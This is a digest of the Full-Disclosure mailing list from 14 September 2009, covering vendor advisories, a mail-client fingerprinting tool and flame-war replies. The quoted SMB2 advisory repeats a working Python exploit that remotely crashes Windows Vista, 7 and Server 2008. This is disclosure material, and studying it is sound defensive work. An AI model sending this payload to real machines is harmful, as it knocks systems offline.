[Full-disclosure] Presentation of Message-ID Fingerprinting Tool

2009-09-14 Thread Marc Ruef
Hello,

Within penetration tests client-oriented attacks become more and more
important.

I have created a script which is able to determine the mail client from
the message-id which is included in an email. Midfp (Message-ID
Fingerprinter) is going to analyze the structure of the message-id and
compare it with regular expressions against a database. Thus, no
further analysis of the email (e.g. the header structures as in my
browserrecon project; http://www.computec.ch/projekte/browserrecon/) is
required.

* Discussion of the Implementation (German only)
http://www.scip.ch/?labs.20090911
http://www.scip.ch/?labs.20090717

* Online Demo
http://www.scip.ch/labs/files/midfp/

* Download midfp-1.0php
http://www.scip.ch/labs/files/midfp-1.0.tar.gz

Regards,

Marc Ruef

-- 
Marc Ruef | m...@scip.ch
scip AG | Badenerstrasse 551 | 8048 Zurich
T +41 44 404 13 13 | F +41 44 404 13 14
Aktuelle Forschungen: http://www.scip.ch/?labs

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
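
The matching step described in the post above (Message-ID structure compared against a table of regular expressions), sketched as an added example for header analysis; it is not midfp's code or database. The three patterns, the function names and the sample messages are assumptions constructed for illustration and need validating against real mail before use.

```python
import re
from email import message_from_string

# ASSUMPTION: illustrative signatures written for this example, not taken
# from midfp's database. Each entry is (label, pattern for the whole ID).
SIGNATURES = [
    ("Gmail",
     re.compile(r"<[A-Za-z0-9_.+=\-]+@mail\.gmail\.com>")),
    ("Mozilla Thunderbird (classic)",
     re.compile(r"<[0-9A-F]{8}\.[0-9]{6,8}@[^<>@\s]+>")),
    ("Microsoft Outlook / Outlook Express",
     re.compile(r"<[0-9a-f]+\$[0-9a-f]+\$[0-9a-f]+@[^<>@\s]+>",
                re.IGNORECASE)),
]

# Loose shape of a msg-id token: <left@right>, no whitespace or nesting.
MSGID_RE = re.compile(r"<[^<>@\s]+@[^<>@\s]+>")


def extract_message_id(raw_message):
    """Return the first <id@host> token of the Message-ID header, or None.

    The email parser handles header folding and case-insensitive names.
    """
    value = message_from_string(raw_message).get("Message-ID")
    if value is None:
        return None
    match = MSGID_RE.search(value)
    return match.group(0) if match else None


def fingerprint(message_id):
    """Return the labels of every signature that matches the whole ID."""
    if message_id is None:
        return []
    return [label for label, pattern in SIGNATURES
            if pattern.fullmatch(message_id)]


def identify(raw_message):
    """Return (message_id, labels). An empty label list means 'unknown'.

    Caveat: when a client sends no Message-ID, a mail server on the path
    may add one, so a match can describe the server, not the client.
    """
    message_id = extract_message_id(raw_message)
    return message_id, fingerprint(message_id)


# Constructed sample messages (not real mail).
SAMPLE_THUNDERBIRD = (
    "From: alice@example.org\n"
    "Message-ID: <4AAE0F3C.7040208@example.org>\n"
    "Subject: test\n\nbody\n"
)
SAMPLE_OUTLOOK = (
    "From: bob@example.com\n"
    "message-id: <000c01ca3541$5e2d9f70$0201a8c0@workstation>\n"
    "Subject: test\n\nbody\n"
)
SAMPLE_GMAIL_FOLDED = (
    "From: carol@gmail.com\n"
    "Message-ID:\n <CAKx7Qm0example=9fT_z@mail.gmail.com>\n"
    "Subject: test\n\nbody\n"
)
SAMPLE_UNKNOWN = (
    "Message-ID: <20090914.123456.qmail@mx.example.net>\n"
    "Subject: test\n\nbody\n"
)
SAMPLE_MISSING = "From: dave@example.net\nSubject: no id\n\nbody\n"
SAMPLE_MALFORMED = "Message-ID: not-an-id\nSubject: broken\n\nbody\n"

if __name__ == "__main__":
    for sample in (SAMPLE_THUNDERBIRD, SAMPLE_OUTLOOK, SAMPLE_GMAIL_FOLDED,
                   SAMPLE_UNKNOWN, SAMPLE_MISSING, SAMPLE_MALFORMED):
        print(identify(sample))
```
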


Re: [Full-disclosure] PakBugs.Com Report

2009-09-14 Thread TheLearner
I wanna be the very best
Like no one ever was
To catch them is my real test
My criminal justice training is my cause

I will travel across the lands
searching far and wide
with pokemon to understand
THE POWER THAT'S INSIDE

POKEMON gotta catch em all (it's you and me)
YOU KNOW ITS MY TEST IN ME
Ohh I have no friends
In a world I must defend

tips.fbi.gov = Send the tip and make stuff happen!

Send it in ASCII style yo

And take a bite out of cybercrime

On Sat, 12 Sep 2009 16:30:12 + Catch Them catch.t...@live.com 
wrote:
As you may know these are mostly based in Pakistan involved in 
illegal activities which include carding, hacking, cracking etc.

I am including this list of their users for law enforcement 
agencies to investigate and take action where neccessary. 
Currently their site is hosted in pacificrack.com's server.

WAR Against Cyber Crime
Catch Them If you can.



Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread Randal T. Rioux
It's fun :-)


On Mon, September 14, 2009 12:14 pm, D-vice wrote:
 You wrote an exploit in java


 *head explodes*

 On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
 ra...@procyonlabs.com wrote:

 After testing my version of the exploit (using Java instead of Python) I
 tried it against a Windows Server 2008 R2 installation - it went down.

 http://www.procyonlabs.com/software/smb2_bsoder

 Randy


 laurent gaffie wrote:
  Advisory updated :
 
 
  =
  - Release date: September 7th, 2009
  - Discovered by: Laurent Gaffié
  - Severity: High
  =
 
  I. VULNERABILITY
  -
  Windows Vista, Server 2008  R2, 7 RC :
  SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
 
  II. BACKGROUND
  -
  Windows vista and newer Windows comes with a new SMB version named
 SMB2.
  See:
 
 http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
  for more details.
 
  III. DESCRIPTION
  -
  [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
  patch, for another SMB2.0 security issue:
  KB942624 (MS07-063)
  Installing only this specific update on Vista SP0 create the following
  issue:
 
  SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
  PROTOCOL REQUEST functionnality.
  The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to
 a
  SMB server, and it's used to identify the SMB dialect that will be
 used
  for futher communication.
 
  IV. PROOF OF CONCEPT
  -
 
  Smb-Bsod.py:
 
  #!/usr/bin/python
  #When SMB2.0 recieve a  char in the Process Id High SMB header
 field
  #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
 
  from socket import socket
 
  host = IP_ADDR, 445
  buff = (
  \x00\x00\x00\x90 # Begin SMB header: Session message
  \xff\x53\x4d\x42 # Server Component: SMB
  \x72\x00\x00\x00 # Negociate Protocol
  \x00\x18\x53\xc8 # Operation 0x18  sub 0xc853
  \x00\x26# Process ID High: -- :) normal value should be \x00\x00
  \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
  \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
  \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
  \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
  \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
  \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
  \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
  \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
  \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
  \x30\x30\x32\x00
  )
  s = socket()
  s.connect(host)
  s.send(buff)
  s.close()
 
  V. BUSINESS IMPACT
  -
  An attacker can remotly crash any Vista/Windows 7 machine with SMB
 enable.
  Windows Xp, 2k, are NOT affected as they dont have this driver.
 
  VI. SYSTEMS AFFECTED
  -
  [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server
 2008
   R2, Windows 7 RC.
 
  VII. SOLUTION
  -
  No patch available for the moment.
  Close SMB feature and ports, until a patch is provided.
  Configure your firewall properly
  You can also follow the MS Workaround:
  http://www.microsoft.com/technet/security/advisory/975497.mspx
 
  VIII. REFERENCES
  -
  http://www.microsoft.com/technet/security/advisory/975497.mspx
 
 http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
 
  IX. CREDITS
  -
  This vulnerability has been discovered by Laurent Gaffié
  Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com
 
  X. REVISION HISTORY
  -
  September 7th, 2009: Initial release
  September 11th, 2009: Revision 1.0 release
 
  XI. LEGAL NOTICES
  -
  The information contained within this advisory is supplied as-is
  with no warranties or guarantees of fitness of use or otherwise.
  I accept no responsibility for any damage caused by the use or
  misuse of this information.
 
  XII.Personal Notes
  -
  Many persons have suggested to update this advisory for RCE and not
 BSOD:
  It wont be done, if they find a way to execute code, they will publish
  them advisory.



Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-14 Thread D-vice
To Dan, being well known is now the same as having your ass handed to ya by
the like of me

Think about it, it's like you saying I'm jealous of Bush because he is was
the president and I'm not

I'm not retarded, I don't envy epic fails


On Fri, Sep 11, 2009 at 6:27 PM, valdis.kletni...@vt.edu wrote:

 On Fri, 11 Sep 2009 12:23:17 +0200, D-vice said:

  you the fuckard that got owned

 You're just jealous that Dan is well-known enough to be a target, and quite
 likely jealous of the fact that Dan *has* a site to be targeted.


[Full-disclosure] PakBugs.Com Report

2009-09-14 Thread full-censorship
Rohit Patnaik quanti...@gmail.com wrote:
 We know that the FBI and the CIA can't even catch Osama bin Laden 
in
 Pakistan.  Do you really think they're going to bother with small-
time
 credit card skimmers?

according to research though its the *small-time* skimmers funding 
the *big-time* terror plots.



Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread D-vice
You wrote an exploit in java


*head explodes*

On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux ra...@procyonlabs.com wrote:

 After testing my version of the exploit (using Java instead of Python) I
 tried it against a Windows Server 2008 R2 installation - it went down.

 http://www.procyonlabs.com/software/smb2_bsoder

 Randy


 laurent gaffie wrote:
  Advisory updated :
 
 
  =
  - Release date: September 7th, 2009
  - Discovered by: Laurent Gaffié
  - Severity: High
  =
 
  I. VULNERABILITY
  -
  Windows Vista, Server 2008  R2, 7 RC :
  SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
 
  II. BACKGROUND
  -
  Windows vista and newer Windows comes with a new SMB version named SMB2.
  See:
 
 http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
  for more details.
 
  III. DESCRIPTION
  -
  [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
  patch, for another SMB2.0 security issue:
  KB942624 (MS07-063)
  Installing only this specific update on Vista SP0 create the following
  issue:
 
  SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
  PROTOCOL REQUEST functionnality.
  The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a
  SMB server, and it's used to identify the SMB dialect that will be used
  for futher communication.
 
  IV. PROOF OF CONCEPT
  -
 
  Smb-Bsod.py:
 
  #!/usr/bin/python
  #When SMB2.0 recieve a  char in the Process Id High SMB header field
  #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
 
  from socket import socket
 
  host = IP_ADDR, 445
  buff = (
  \x00\x00\x00\x90 # Begin SMB header: Session message
  \xff\x53\x4d\x42 # Server Component: SMB
  \x72\x00\x00\x00 # Negociate Protocol
  \x00\x18\x53\xc8 # Operation 0x18  sub 0xc853
  \x00\x26# Process ID High: -- :) normal value should be \x00\x00
  \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
  \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
  \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
  \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
  \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
  \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
  \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
  \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
  \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
  \x30\x30\x32\x00
  )
  s = socket()
  s.connect(host)
  s.send(buff)
  s.close()
 
  V. BUSINESS IMPACT
  -
  An attacker can remotly crash any Vista/Windows 7 machine with SMB
 enable.
  Windows Xp, 2k, are NOT affected as they dont have this driver.
 
  VI. SYSTEMS AFFECTED
  -
  [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
   R2, Windows 7 RC.
 
  VII. SOLUTION
  -
  No patch available for the moment.
  Close SMB feature and ports, until a patch is provided.
  Configure your firewall properly
  You can also follow the MS Workaround:
  http://www.microsoft.com/technet/security/advisory/975497.mspx
 
  VIII. REFERENCES
  -
  http://www.microsoft.com/technet/security/advisory/975497.mspx
 
 http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
 
  IX. CREDITS
  -
  This vulnerability has been discovered by Laurent Gaffié
  Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com
 
  X. REVISION HISTORY
  -
  September 7th, 2009: Initial release
  September 11th, 2009: Revision 1.0 release
 
  XI. LEGAL NOTICES
  -
  The information contained within this advisory is supplied as-is
  with no warranties or guarantees of fitness of use or otherwise.
  I accept no responsibility for any damage caused by the use or
  misuse of this information.
 
  XII.Personal Notes
  -
  Many persons have suggested to update this advisory for RCE and not BSOD:
  It wont be done, if they find a way to execute code, they will publish
  them advisory.


[Full-disclosure] [SECURITY] [DSA 1883-2] New nagios2 packages fix regression

2009-09-14 Thread Steffen Joeris
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1883-2                  secur...@debian.org
http://www.debian.org/security/                        Giuseppe Iuculano
September 14, 2009                    http://www.debian.org/security/faq
- 

Package: nagios2
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE Ids: CVE-2007-5624 CVE-2007-5803 CVE-2008-1360
Debian Bugs: 448371 482445 485439

The previous nagios2 update introduced a regression, which caused
status.cgi to segfault when used directly without specifying the 'host'
variable. This update fixes the problem. For reference the original
advisory text follows.


Several vulnerabilities have been found in nagios2, a host/service/network
monitoring and management system. The Common Vulnerabilities and
Exposures project identifies the following problems:


Several cross-site scripting issues via several parameters were
discovered in the CGI scripts, allowing attackers to inject arbitrary
HTML code. In order to cover the different attack vectors, these issues
have been assigned CVE-2007-5624, CVE-2007-5803 and CVE-2008-1360.



For the oldstable distribution (etch), these problems have been fixed in
version 2.6-2+etch5.

The stable distribution (lenny) does not include nagios2 and nagios3 is
not affected by these problems.

The testing distribution (squeeze) and the unstable distribution (sid)
do not contain nagios2 and nagios3 is not affected by these problems.


We recommend that you upgrade your nagios2 packages.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian GNU/Linux 5.0 alias lenny
- 

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.


[Full-disclosure] [SECURITY] [DSA 1885-1] New xulrunner packages fix several vulnerabilities

2009-09-14 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1885-1                  secur...@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
September 14, 2009                    http://www.debian.org/security/faq
- 

Package: xulrunner
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2009-3070 CVE-2009-3071 CVE-2009-3072 CVE-2009-3074 
CVE-2009-3075 CVE-2009-3076 CVE-2009-3077 CVE-2009-3078

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications, such as the Iceweasel web
browser. The Common Vulnerabilities and Exposures project identifies
the following problems:

CVE-2009-3070 

Jesse Ruderman discovered crashes in the layout engine, which
might allow the execution of arbitrary code.

CVE-2009-3071

Daniel Holbert, Jesse Ruderman, Olli Pettay and toshi discovered
crashes in the layout engine, which might allow the execution of
arbitrary code.

CVE-2009-3072

Josh Soref, Jesse Ruderman and Martin Wargers discovered crashes
in the layout engine, which might allow the execution of arbitrary
code.

CVE-2009-3074

Jesse Ruderman discovered a crash in the Javascript engine, which
might allow the execution of arbitrary code.

CVE-2009-3075

Carsten Book and Taral discovered crashes in the layout engine,
which might allow the execution of arbitrary code.

CVE-2009-3076

Jesse Ruderman discovered that the user interface for installing/
removing PKCS #11 security modules wasn't informative enough, which
might allow social engineering attacks.

CVE-2009-3077

It was discovered that incorrect pointer handling in the XUL parser
could lead to the execution of arbitrary code.

CVE-2009-3078

Juan Pablo Lopez Yacubian discovered that incorrect rendering of
some Unicode font characters could lead to spoofing attacks on
the location bar.

For the stable distribution (lenny), these problems have been fixed
in version 1.9.0.14-0lenny1.

As indicated in the Etch release notes, security support for the
Mozilla products in the oldstable distribution needed to be stopped
before the end of the regular Etch security maintenance life cycle.
You are strongly encouraged to upgrade to stable or switch to a still
supported browser.

For the unstable distribution (sid), these problems have been fixed in
version 1.9.0.14-1.

For the experimental distribution, these problems have been fixed in
version 1.9.1.3-1.

We recommend that you upgrade your xulrunner package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.


[Full-disclosure] [SECURITY] [DSA 1886-1] New iceweasel packages fix several vulnerabilities

2009-09-14 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1886-1                  secur...@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
September 14, 2009                    http://www.debian.org/security/faq
- 

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2009-1310 CVE-2009-3079

Several remote vulnerabilities have been discovered in the Iceweasel web
browser, an unbranded version of the Firefox browser. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-3079

   moz_bug_r_a4 discovered that a programming error in the FeedWriter
   module could lead to the execution of Javascript code with elevated
   privileges.

CVE-2009-1310

   Prateek Saxena discovered a cross-site scripting vulnerability in
   the MozSearch plugin interface.

For the stable distribution (lenny), these problems have been fixed in
version 3.0.6-3.

As indicated in the Etch release notes, security support for the
Mozilla products in the oldstable distribution needed to be stopped
before the end of the regular Etch security maintenance life cycle.
You are strongly encouraged to upgrade to stable or switch to a still
supported browser.

For the unstable distribution (sid), these problems have been fixed in
version 3.0.14-1.

For the experimental distribution, these problems have been fixed in
version 3.5.3-1.

We recommend that you upgrade your iceweasel packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.


Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread r1d1nd1rty
Oh WOW! More exploit code ported to Java!!

Hello Randy,
Not everyone would have gone to all the trouble you did for me 
and I want you to know how much I appreciate it. It seems that you 
are always going above and beyond the call of duty. No wonder so 
many people are happy and proud to call you an elite h4x0r. It was 
really wonderful of you to direct port Laurent's SMB2.0 BSOD python 
exploit code in to Java and call it your own, and I'll never be 
able to thank you enough. 

However, in doing so, an apology to Laurent AND the FD list for the 
dissemination of your Java port and post to FD mailing list is 
therefore required. There is simply no need for Java in any 
circumstances, and it is truly a shame to see such a wonderful 
exploit treated in such a horrendous way. Perhaps if you added, 
removed or improved the exploit, an apology would not have been 
required... but you didn't.

Thanks for your time,
  /rd

for dem geeks rdy to bounce 'em

Ya my number two on some old school DJ Screw
You can't arrest me, plus you can't sue
This is a message to the laws, tell 'em We hate you
I could be tough tell 'em that they shoulda known
Tippin down, sittin crooked on my chrome
Bookin my phone, findin a chick I wanna bone
Like they couldn't stop me
I'm bout to pull up at your home, and it's on

...

It's fun :-) 
 On Mon, September 14, 2009 12:14 pm, D-vice wrote: 
  You wrote an exploit in java
 
 
  *head explodes*
 
  On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
  randy_at_procyonlabs.com wrote:
 
  After testing my version of the exploit (using Java instead of 
Python) I
  tried it against a Windows Server 2008 R2 installation - it 
went down.
 
  http://www.procyonlabs.com/software/smb2_bsoder
 
  Randy
 
 
  laurent gaffie wrote:
   Advisory updated :
  
  
   =
   - Release date: September 7th, 2009
   - Discovered by: Laurent Gaffié
   - Severity: High
   =
  
   I. VULNERABILITY
-
   Windows Vista, Server 2008  R2, 7 RC :
   SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
  
   II. BACKGROUND
-
   Windows vista and newer Windows comes with a new SMB version 
named
  SMB2.
See:
  
  
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
   for more details.
  
   III. DESCRIPTION
-
   [Edit]Unfortunatly this SMB2 security issue is specificaly 
due to a MS
   patch, for another SMB2.0 security issue:
   KB942624 (MS07-063)
   Installing only this specific update on Vista SP0 create the 
following
   issue:
  
   SRV2.SYS fails to handle malformed SMB headers for the 
NEGOTIATE
   PROTOCOL REQUEST functionnality.
   The NEGOTIATE PROTOCOL REQUEST is the first SMB query a 
client send to
  a
   SMB server, and it's used to identify the SMB dialect that 
will be
  used
   for futher communication.
  
   IV. PROOF OF CONCEPT
-
  
   Smb-Bsod.py:
  
   #!/usr/bin/python
   #When SMB2.0 recieve a  char in the Process Id High SMB 
header
  field
   #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
  
   from socket import socket
  
   host = IP_ADDR, 445
   buff = (
   \x00\x00\x00\x90 # Begin SMB header: Session message
   \xff\x53\x4d\x42 # Server Component: SMB
   \x72\x00\x00\x00 # Negociate Protocol
   \x00\x18\x53\xc8 # Operation 0x18  sub 0xc853
   \x00\x26# Process ID High: -- :) normal value should be 
\x00\x00
   \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
   \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
   \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
   \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
   \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
   \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
   \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
   \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
   \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
   \x30\x30\x32\x00
   )
   s = socket()
   s.connect(host)
   s.send(buff)
   s.close()
  
   V. BUSINESS IMPACT
-
   An attacker can remotly crash any Vista/Windows 7 machine 
with SMB
  enable.
   Windows Xp, 2k, are NOT affected as they dont have this 
driver.
  
   VI. SYSTEMS AFFECTED
-
   [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win 
Server
  2008
R2, Windows 7 RC.
  
   VII. SOLUTION
-
   No patch available for the moment.
   Close SMB feature and ports, until a patch is provided.
   Configure your firewall properly
   You can also follow the MS Workaround:
   http://www.microsoft.com/technet/security/advisory/975497.mspx
  
   VIII. REFERENCES
-
   http://www.microsoft.com/technet/security/advisory/975497.mspx
  
  http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-

Re: [Full-disclosure] PakBugs.Com Report

2009-09-14 Thread Rohit Patnaik
We know that the FBI and the CIA can't even catch Osama bin Laden in 
Pakistan.  Do you really think they're going to bother with small-time 
credit card skimmers?

--Rohit Patnaik

TheLearner wrote:
 I wanna be the very best
 Like no one ever was
 To catch them is my real test
 My criminal justice training is my cause

 I will travel across the lands
 searching far and wide
 with pokemon to understand
 THE POWER THAT'S INSIDE

 POKEMON gotta catch em all (it's you and me)
 YOU KNOW ITS MY TEST IN ME
 Ohh I have no friends
 In a world I must defend

 tips.fbi.gov = Send the tip and make stuff happen!

 Send it in ASCII style yo

 And take a bite out of cybercrime

 On Sat, 12 Sep 2009 16:30:12 + Catch Them catch.t...@live.com 
 wrote:
   
 As you may know these are mostly based in Pakistan involved in 
 illegal activities which include carding, hacking, cracking etc.

 I am including this list of their users for law enforcement 
 agencies to investigate and take action where necessary. 
 Currently their site is hosted in pacificrack.com's server.

 WAR Against Cyber Crime
 Catch Them If you can.



[Full-disclosure] [SECURITY] [DSA 1884-1] New nginx packages fix arbitrary code execution

2009-09-14 Thread Nico Golde

- --
Debian Security Advisory DSA-1884-1                  secur...@debian.org
http://www.debian.org/security/                           Nico Golde
September 14th, 2009                   http://www.debian.org/security/faq
- --

Package: nginx
Vulnerability  : buffer underflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2009-2629

Chris Ries discovered that nginx, a high-performance HTTP server, reverse
proxy and IMAP/POP3 proxy server, is vulnerable to a buffer underflow when
processing certain HTTP requests.  An attacker can use this to execute
arbitrary code with the rights of the worker process (www-data on Debian)
or possibly perform denial of service attacks by repeatedly crashing
worker processes via a specially crafted URL in an HTTP request.


For the oldstable distribution (etch), this problem has been fixed in
version 0.4.13-2+etch2.

For the stable distribution (lenny), this problem has been fixed in
version 0.6.32-3+lenny2.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 0.7.61-3.


We recommend that you upgrade your nginx packages.

Upgrade instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.



Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2.dsc
Size/MD5 checksum: 1238 41197ff9eca3cb3707ca5eff5e431183
  

[Full-disclosure] Distribution of passwords between man and women

2009-09-14 Thread Tõnu Samuel
Hi all kind of bad people in this list.

Want to share weird thing I discovered today: Men have MUCH worse
passwords than females. There is a user database where men to women
ratio is 5.2:1 but men use last name more often as password. Ratio
is 6.2:1. When it comes to bad password like 123456, men used it on
9.3:1 ratio. More details I put on page:

http://no.spam.ee/~tonu/passwords.html

If you want me run more queries on this DB, mail me in private back and
publish them too on same page.

  Tõnu


[Full-disclosure] [USN-830-1] OpenSSL vulnerability

2009-09-14 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-830-1 September 14, 2009
openssl vulnerability
CVE-2009-2409
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libssl0.9.8 0.9.8a-7ubuntu0.10

Ubuntu 8.04 LTS:
  libssl0.9.8 0.9.8g-4ubuntu3.8

Ubuntu 8.10:
  libssl0.9.8 0.9.8g-10.1ubuntu2.5

Ubuntu 9.04:
  libssl0.9.8 0.9.8g-15ubuntu3.3

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

Dan Kaminsky discovered OpenSSL would still accept certificates with MD2
hash signatures. As a result, an attacker could potentially create a
malicious trusted certificate to impersonate another site. This update
handles this issue by completely disabling MD2 for certificate validation.


Updated packages for Ubuntu 6.06 LTS:



[Full-disclosure] [USN-831-1] OpenEXR vulnerabilities

2009-09-14 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-831-1 September 14, 2009
openexr vulnerabilities
CVE-2009-1720, CVE-2009-1721, CVE-2009-1722
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  libopenexr2ldbl 1.2.2-4.4ubuntu1.1

Ubuntu 8.10:
  libopenexr6 1.6.1-3ubuntu1.8.10.1

Ubuntu 9.04:
  libopenexr6 1.6.1-3ubuntu1.9.04.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Drew Yao discovered several flaws in the way OpenEXR handled certain
malformed EXR image files. If a user were tricked into opening a crafted
